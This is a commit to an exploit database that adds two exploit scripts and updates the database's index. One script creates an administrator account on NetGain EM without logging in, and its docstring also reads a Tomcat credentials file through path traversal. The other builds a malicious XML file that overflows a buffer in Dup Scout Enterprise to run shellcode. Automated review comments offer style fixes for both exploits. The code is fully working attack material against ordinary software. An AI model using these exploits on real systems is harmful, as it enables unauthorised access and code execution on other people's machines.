DB: 2017-05-25

2 new exploits

Microsoft Windows XP - Keyboard Layouts Pool Corruption LPE (PoC) (MS12-034)
Microsoft Windows XP - Keyboard Layouts Pool Corruption (PoC) (MS12-034)

Microsoft Internet Explorer 6 - HtmlDlgSafeHelper Remote Denial of Service
Microsoft Internet Explorer 6 - 'HtmlDlgSafeHelper' Remote Denial of Service

Dup Scout Enterprise 9.7.18 - '.xml' Local Buffer Overflow

NetGain EM 7.2.647 build 941 - Authentication Bypass / Local File Inclusion
Offensive Security 2017-05-25 05:01:17 +00:00
parent 2907a841a7
commit 07c41df34d
3 changed files with 186 additions and 2 deletions


@ -2200,7 +2200,7 @@ id,file,description,date,author,platform,type,port
18878,platforms/windows/dos/18878.txt,"Pro-face Pro-Server EX WinGP PC Runtime - Multiple Vulnerabilities",2012-05-14,"Luigi Auriemma",windows,dos,0
18890,platforms/multiple/dos/18890.txt,"Java - Trigerring Java Code from a .SVG Image",2012-05-16,"Nicolas Gregoire",multiple,dos,0
18909,platforms/php/dos/18909.php,"PHP 5.4.3 - wddx_serialize_* / stream_bucket_* Variant Object Null Ptr Dereference",2012-05-21,condis,php,dos,0
18894,platforms/windows/dos/18894.txt,"Microsoft Windows XP - Keyboard Layouts Pool Corruption LPE (PoC) (MS12-034)",2012-05-18,Cr4sh,windows,dos,0
18894,platforms/windows/dos/18894.txt,"Microsoft Windows XP - Keyboard Layouts Pool Corruption (PoC) (MS12-034)",2012-05-18,Cr4sh,windows,dos,0
18902,platforms/windows/dos/18902.rb,"Real-DRAW PRO 5.2.4 - Import File Crash",2012-05-21,"Ahmed Elhady Mohamed",windows,dos,0
18903,platforms/windows/dos/18903.rb,"DVD-Lab Studio 1.25 - '.DAL' File Open Crash",2012-05-21,"Ahmed Elhady Mohamed",windows,dos,0
18910,platforms/php/dos/18910.php,"PHP 5.4.3 - (com_event_sink) Denial of Service",2012-05-21,condis,php,dos,0
@ -3586,7 +3586,7 @@ id,file,description,date,author,platform,type,port
28194,platforms/windows/dos/28194.txt,"Microsoft Internet Explorer 6 - RDS.DataControl Denial of Service",2006-07-08,hdm,windows,dos,0
28196,platforms/windows/dos/28196.txt,"Microsoft Internet Explorer 6 - DirectAnimation.DAUserData Denial of Service",2006-07-08,hdm,windows,dos,0
28197,platforms/windows/dos/28197.txt,"Microsoft Internet Explorer 6 - Object.Microsoft.DXTFilter Denial of Service",2006-07-09,hdm,windows,dos,0
28202,platforms/windows/dos/28202.txt,"Microsoft Internet Explorer 6 - HtmlDlgSafeHelper Remote Denial of Service",2006-07-10,hdm,windows,dos,0
28202,platforms/windows/dos/28202.txt,"Microsoft Internet Explorer 6 - 'HtmlDlgSafeHelper' Remote Denial of Service",2006-07-10,hdm,windows,dos,0
28207,platforms/windows/dos/28207.txt,"Microsoft Internet Explorer 6 - TriEditDocument Denial of Service",2006-07-11,hdm,windows,dos,0
28213,platforms/windows/dos/28213.txt,"Microsoft Internet Explorer 6 - RevealTrans Denial of Service",2006-07-12,hdm,windows,dos,0
28220,platforms/linux/dos/28220.txt,"KDE Konqueror 3.5.x - ReplaceChild Denial of Service",2006-07-14,hdm,linux,dos,0
@ -9008,6 +9008,7 @@ id,file,description,date,author,platform,type,port
42020,platforms/windows/local/42020.cpp,"Microsoft Windows - COM Aggregate Marshaler/IRemUnknown2 Type Confusion Privilege Escalation",2017-05-17,"Google Security Research",windows,local,0
42045,platforms/linux/local/42045.c,"VMware Workstation for Linux 12.5.2 build-4638234 - ALSA Config Host Root Privilege Escalation",2017-05-22,"Google Security Research",linux,local,0
42053,platforms/linux/local/42053.c,"KDE 4/5 - 'KAuth' Privilege Escalation",2017-05-18,Stealth,linux,local,0
42059,platforms/windows/local/42059.py,"Dup Scout Enterprise 9.7.18 - '.xml' Local Buffer Overflow",2017-05-24,ScrR1pTK1dd13,windows,local,0
1,platforms/windows/remote/1.c,"Microsoft IIS - WebDAV 'ntdll.dll' Remote Exploit",2003-03-23,kralor,windows,remote,80
2,platforms/windows/remote/2.c,"Microsoft IIS 5.0 - WebDAV Remote Exploit (PoC)",2003-03-24,RoMaNSoFt,windows,remote,80
5,platforms/windows/remote/5.c,"Microsoft Windows - RPC Locator Service Remote Exploit",2003-04-03,"Marcin Wolak",windows,remote,139
@ -37778,6 +37779,7 @@ id,file,description,date,author,platform,type,port
41697,platforms/linux/webapps/41697.rb,"SixApart MovableType < 5.2.12 - Storable Perl Code Execution (Metasploit)",2015-02-11,Metasploit,linux,webapps,0
41698,platforms/linux/webapps/41698.rb,"WordPress Theme Holding Pattern - Arbitrary File Upload (Metasploit)",2015-02-11,Metasploit,linux,webapps,0
41714,platforms/windows/webapps/41714.rb,"Distinct TFTP 3.10 - Writable Directory Traversal Execution (Metasploit)",2012-04-08,Metasploit,windows,webapps,0
42058,platforms/jsp/webapps/42058.py,"NetGain EM 7.2.647 build 941 - Authentication Bypass / Local File Inclusion",2017-05-24,f3ci,jsp,webapps,0
41899,platforms/multiple/webapps/41899.html,"Apple WebKit / Safari 10.0.2(12602.3.12.0.1) - 'PrototypeMap::createEmptyStructure' Universal Cross-Site Scripting",2017-04-20,"Google Security Research",multiple,webapps,0
41716,platforms/php/webapps/41716.txt,"Gr8 Tutorial Script - SQL Injection",2017-03-24,"Ihsan Sencan",php,webapps,0
41717,platforms/php/webapps/41717.txt,"Gr8 Gallery Script - SQL Injection",2017-03-24,"Ihsan Sencan",php,webapps,0


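--- a/platforms/jsp/webapps/42058.py
+++ b/platforms/jsp/webapps/42058.py
@@ -0,0 +1,122 @@
+'''
+# Exploit Title: Add User Account with Admin Privilege without Login & Local File Inclusion
+# Date: 2017-05-21
+# Exploit Author: f3ci
+# Vendor Homepage: http://www.netgain-systems.com
+# Software Link: http://www.netgain-systems.com/free-edition-download/
+# Version: <= v7.2.647 build 941
+# Tested on: Windows 7
+Add User Account with Admin Privilege without Login
+----------------------------------------------
+We can create user and give admin privilege to user which we have made
+without login.
+Because this app does not check the session on this request
+Local File Inclusion
+----------------------------------------------
+Normal Request:
+POST /u/jsp/log/download_do.jsp HTTP/1.1
+Host: 192.168.0.21:8081
+User-Agent: Mozilla/5.0 (X11; Linux i686; rv:45.0) Gecko/20100101
+Firefox/45.0
+Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
+Accept-Language: en-US,en;q=0.5
+Accept-Encoding: gzip, deflate
+Referer: http://192.168.0.21:8081/u/index.jsp
+Cookie: JSESSIONID=8A172EB8DDBD08D1E6D25A1CE8CC74AC
+Connection: close
+Content-Type: application/x-www-form-urlencoded
+Content-Length: 18
+filename=iossd.log
+We can download another file with change value on filename parameter and
+also we can send this request without login.
+Example:
+POST /u/jsp/log/download_do.jsp HTTP/1.1
+Host: 192.168.0.21:8081
+User-Agent: Mozilla/5.0 (X11; Linux i686; rv:45.0) Gecko/20100101
+Firefox/45.0
+Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
+Accept-Language: en-US,en;q=0.5
+Accept-Encoding: gzip, deflate
+Referer: http://192.168.0.21:8081/u/index.jsp
+Connection: close
+Content-Type: application/x-www-form-urlencoded
+Content-Length: 18
+filename=../../tomcat/conf/tomcat-users.xml
+'''
+#!/usr/local/bin/python
+# Exploit Title: Add User Account with Admin Privilege without Login
+# Date: 2017-05-21
+# Exploit Author: f3ci
+# Vendor Homepage: http://www.netgain-systems.com
+# Software Link: http://www.netgain-systems.com/free-edition-download/
+# Version: <= v7.2.647 build 941
+# Tested on: Windows 7
+import requests
+import sys
+try:
+def create():
+ip = str(sys.argv[1])
+port = str(sys.argv[2])
+user = str(sys.argv[3])
+passwd = str(sys.argv[4])
+print "\033[1;32m[+]\033[1;m Try to Create user"
+url="http://"+ip+":"+port+"/u/jsp/security/user_save_do.jsp"
+data= {
+'new': "true",
+'id': "",
+'name': user,
+'dname': "foobar",
+'password': passwd,
+'password2': passwd,
+'description': "",
+'emails': "foo@bar.com",
+'mobileNumber': "000000",
+'loginAttempts': "5",
+}
+response = requests.post(url, data=data)
+status = response.status_code
+if status == 200:
+print "\033[1;32m[+]\033[1;m Success!!"
+role()
+else:
+print "\033[91m[-]\033[91;m Create User Failed"
+def role():
+ip = str(sys.argv[1])
+port = str(sys.argv[2])
+user = str(sys.argv[3])
+passwd = str(sys.argv[4])
+print "\033[1;32m[+]\033[1;m Get admin role"
+url="http://"+ip+":"+port+"/u/jsp/security/role_save_do.jsp"
+data= {
+'name': "admin",
+'description': "Administrator",
+'users': [user,"admin"],
+}
+response = requests.post(url, data=data)
+status = response.status_code
+if status == 200:
+print "\033[1;32m[+]\033[1;m Success!!"
+print "\033[1;32m[+]\033[1;m Login with user:" +user+ " password:" + passwd
+else:
+print "\033[91m[-]\033[91;m Get admin role Failed"
+create();
+except:
+print "\033[91m[!]\033[91;m Usage: %s <IP> <port> <username> <password>" % str(sys.argv[0])
+print "\033[91m[!]\033[91;m Ex: %s 127.0.0.1 8081 foobar passw0rd" % str(sys.argv[0])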
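Review bot: The `# Exploit Title` header after the shebang and the docstring above it both advertise the Local File Inclusion via `download_do.jsp`, but the code only automates the two unauthenticated POSTs to `/u/jsp/security/user_save_do.jsp` and `/u/jsp/security/role_save_do.jsp`; the file-read request exists only as a raw example in the docstring and is never sent, so a header comment such as `# Only the unauthenticated user/role creation is automated; the download_do.jsp file read is documented above, not implemented.` would set expectations correctly. The root cause the docstring states ("this app does not check the session on this request") is also the remediation worth recording: both save endpoints and the download endpoint need the same session and role check as the rest of the application, and the header has no line naming a vendor fix or stating that none was available at publication. Structurally, the `try:` wraps the two `def` statements and the `create();` call in one block, which is unusual; defining the functions at module level and keeping only the argument handling and the call under an `if __name__ == '__main__':` guard would be the idiomatic shape.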


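--- a/platforms/windows/local/42059.py
+++ b/platforms/windows/local/42059.py
@@ -0,0 +1,60 @@
+author = '''
+##############################################
+# Created: ScrR1pTK1dd13 #
+# Name: Greg Priest #
+# Mail: ScR1pTK1dd13.slammer@gmail.com #
+##############################################
+# Exploit Title: Dup Scout Enterprise v9.7.18 Import Local Buffer Overflow Vuln.(SEH)
+# Date: 2017.05.24
+# Exploit Author: Greg Priest
+# Version: Dup Scout Enterprise v9.7.18
+# Tested on: Windows7 x64 HUN/ENG Professional
+'''
+import os
+import struct
+overflow = "A" * 1536
+jmp_esp = "\x94\x21\x1C\x65"
+#651F20E5
+#651F214E
+#652041ED
+nop = "\x90" * 16
+esp = "\x8D\x44\x24\x4A"
+jmp = "\xFF\xE0"
+nop2 = "\x90" * 70
+nSEH = "\x90\x90\xEB\x05"
+SEH = "\x80\x5F\x1C\x90"
+#"\x80\x5F\x1C\x65"
+#6508F78D
+#650E129F
+#651C5F80
+shellcode =(
+"\x31\xdb\x64\x8b\x7b\x30\x8b\x7f" +
+"\x0c\x8b\x7f\x1c\x8b\x47\x08\x8b" +
+"\x77\x20\x8b\x3f\x80\x7e\x0c\x33" +
+"\x75\xf2\x89\xc7\x03\x78\x3c\x8b" +
+"\x57\x78\x01\xc2\x8b\x7a\x20\x01" +
+"\xc7\x89\xdd\x8b\x34\xaf\x01\xc6" +
+"\x45\x81\x3e\x43\x72\x65\x61\x75" +
+"\xf2\x81\x7e\x08\x6f\x63\x65\x73" +
+"\x75\xe9\x8b\x7a\x24\x01\xc7\x66" +
+"\x8b\x2c\x6f\x8b\x7a\x1c\x01\xc7" +
+"\x8b\x7c\xaf\xfc\x01\xc7\x89\xd9" +
+"\xb1\xff\x53\xe2\xfd\x68\x63\x61" +
+"\x6c\x63\x89\xe2\x52\x52\x53\x53" +
+"\x53\x53\x53\x53\x52\x53\xff\xd7")
+crash = overflow+jmp_esp+nop+esp+jmp+nop2+nSEH+SEH+"\x90" * 10+shellcode
+evil = '<?xml version="1.0" encoding="UTF-8"?>\n<classify\nname=\'' + crash + '\n</classify>'
+exploit = open('Ev1l.xml', 'w')
+exploit.write(evil)
+exploit.close()
+print "Ev1l.xml raedy!"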
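Review bot: `import os` and `import struct` directly after the `author` string are never used anywhere in the file, and the `open('Ev1l.xml', 'w')` / `write` / `close` sequence at the end should be a context manager: `with open('Ev1l.xml', 'w') as exploit:` followed by the indented `exploit.write(evil)`. The runtime string `"Ev1l.xml raedy!"` misspells "ready". The header records the version and the test platform but no vendor fix, advisory or CVE reference, so a reader cannot tell from the header whether a patched build exists; the commented-out hex values following `jmp_esp` and `SEH` are dead code with no explanation and should be either documented or dropped. The `shellcode` block carries no comment describing its effect — it appears to push the bytes of "calc" shortly before its final call, but that should be confirmed and stated in a one-line comment rather than left for the reader to disassemble.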